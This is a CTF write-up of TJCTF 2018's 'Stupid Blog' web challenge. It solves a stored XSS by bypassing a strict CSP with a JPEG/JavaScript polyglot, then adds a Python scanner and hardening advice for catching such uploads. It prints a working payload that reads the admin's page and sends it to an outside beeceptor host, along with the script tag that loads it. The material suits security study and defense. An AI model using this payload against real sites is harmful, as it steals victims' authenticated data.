Stupid Blog

TJCTF 2018 - Web (130 pts).

TJCTF 2018: Stupid Blog

Challenge details

Event: TJCTF 2018
Challenge: Stupid Blog
Category: Web
Points: 130
Solves: 22

Description

Author: okulkarni

I created this blog site, but it doesn’t do much. I did hide a flag on here though. Maybe you can convince the admin user to give it to you?

TL;DR

Stupid Blog was a stored XSS challenge in which the CSP had to be bypassed with a polyglot JPEG file uploaded as a profile picture.

Methodology

Find the XSS

Once on the website you have two options, register and log in. So I created an account and logged in.

[Image: 1.png]

After logging in there are three more options: upload a profile picture (JPEG/PNG), write a post on your "blog", and report a user. Because I had solved a similar challenge in EasyCTF (Fumblr), I immediately thought of an XSS.

[Image: 2.PNG]

So I tested an XSS payload in a post. It was injected into the page unescaped, but it was not executed, because of the very strict CSP.

[Image: 3.PNG]

content-security-policy: default-src 'self'

Now I know that I need to bypass the CSP to execute JavaScript on my profile page. A policy of default-src 'self' blocks inline scripts, but it still allows any script loaded from the site's own origin, and user uploads are served from that same origin. Once the script runs on my profile, reporting my account to the admin will make him execute it.

Bypass the CSP

Since we have an image upload and a strict CSP to bypass, I thought of an article by Gareth Heyes on PortSwigger about exactly that: a JPEG that is also valid JavaScript. So I reused his PoC image to bypass the CSP.

His PoC contains, among other things, this JavaScript:

*/=alert("Burp rocks.");/*

I replaced it with my payload:

*/=x=new XMLHttpRequest();x.open("GET","admin",false);x.send(null);document.location="http://drstache.proxy.beeceptor.com/y"+x.responseText;/*

The payload makes the admin's browser fetch his own blog page (a same-origin request, so it is made with his session) and then navigate to http://drstache.proxy.beeceptor.com with the entire response body appended to the URL, where I can read it.

Next, the XSS has to load the polyglot JPEG as a script. To do so I post <script charset="ISO-8859-1" src="ggg/pfp"></script> on my blog: the profile picture lives on the same origin, so the CSP allows it, and the ISO-8859-1 charset keeps the image bytes from being re-encoded before the JavaScript engine parses them.

The last step is to report my user to the admin and wait for him to visit my profile.
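The defensive counterpart of the steps above is an upload check that refuses images shaped like this polyglot. The following scanner is an added example, not the challenge's code and not PortSwigger's PoC: it walks the JPEG segment structure and reports the two tell-tales the technique depends on, a segment length field whose bytes read as "/*" (0x2F2A, the trick from the public write-up referenced above) and a "*/" comment closer inside a segment payload or after the end-of-image marker. The two sample files at the bottom are constructed inline for the demonstration; the assumed upload-handler usage is simply to reject any file for which is_polyglot returns True. Beyond scanning, the structural fixes are to re-encode uploaded images server side, to serve user content from a separate origin so 'self' no longer covers it, and to send X-Content-Type-Options: nosniff with an image Content-Type so the browser refuses to execute the response as a script.

```python
"""Flag JPEG uploads that can also be parsed as JavaScript.

A JPEG is a chain of segments: a marker (0xFF, id) and, for most markers,
a 2-byte big-endian length that counts itself plus the payload. The polyglot
used in this challenge picks the APP0 length so that its bytes, read as
ISO-8859-1, spell "/*"; the binary that follows becomes a JS comment, which
is closed with "*/" just before the code and reopened right after it.
"""
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM and the RSTn markers.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))
JS_OPEN, JS_CLOSE = b"/*", b"*/"   # 0x2F2A is also a legal-looking length (12074)


def parse_segments(data):
    """Return (segments, end): segments is a list of
    (offset, marker, length_bytes, payload); end is where structured parsing
    stopped (after EOI, or after the SOS header, because the entropy-coded
    scan data that follows SOS carries no length field)."""
    if not data.startswith(b"\xff" + bytes([SOI])):
        raise ValueError("not a JPEG: missing SOI marker")
    segments, pos = [], 0
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            segments.append((pos, marker, b"", b""))
            pos += 2
            if marker == EOI:
                break
            continue
        length_bytes = data[pos + 2:pos + 4]
        if len(length_bytes) < 2:
            raise ValueError(f"truncated length field at offset {pos}")
        (length,) = struct.unpack(">H", length_bytes)
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        payload = data[pos + 4:pos + 2 + length]
        segments.append((pos, marker, length_bytes, payload))
        pos += 2 + length
        if marker == SOS:
            break
    return segments, pos


def polyglot_indicators(data):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    segments, end = parse_segments(data)
    for offset, marker, length_bytes, payload in segments:
        if length_bytes == JS_OPEN:
            findings.append(f"FF{marker:02X} at {offset}: length bytes spell '/*'")
        if JS_CLOSE in payload:
            # Show what a JS engine would see between the comment delimiters.
            text = payload.decode("latin-1")
            start = text.index("*/")
            stop = text.find("/*", start + 2)
            snippet = text[start:stop if stop != -1 else start + 80]
            findings.append(f"FF{marker:02X} at {offset}: payload closes a JS comment: {snippet!r}")
    trailing = data[end:]   # decoders ignore bytes after EOI, JS engines do not
    if JS_CLOSE in trailing:
        findings.append(f"{len(trailing)} trailing bytes after offset {end} contain '*/'")
    return findings


def is_polyglot(data):
    """Upload-handler decision: True means reject the file."""
    return bool(polyglot_indicators(data))


# Constructed samples (not real uploads): a minimal benign JFIF header and a
# file shaped like the polyglot described in the write-up.
JFIF = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
BENIGN = b"\xff\xd8\xff\xe0" + struct.pack(">H", 2 + len(JFIF)) + JFIF + b"\xff\xd9"
_payload = (JFIF + b"*/=alert(1);/*").ljust(0x2F2A - 2, b"\x00")
SUSPICIOUS = b"\xff\xd8\xff\xe0" + JS_OPEN + _payload + b"\xff\xd9" + JS_CLOSE

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, polyglot_indicators(sample) or "clean")
```

The scanner is deliberately conservative: a legitimate APP0 length of exactly 12074 bytes or a stray "*/" in EXIF text would trip it, which is the right trade-off for an upload gate, and re-encoding the image after the check removes both the false positive and the risk.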

[Image: 4.PNG]

After a few minutes a request from the admin arrived at my beeceptor endpoint \o7

[Image: 5.PNG]

It contained the whole admin page, with the flag inside.

Flag

tjctf{1m4g3_p0lygl0t_1s_w3ird}

DrStache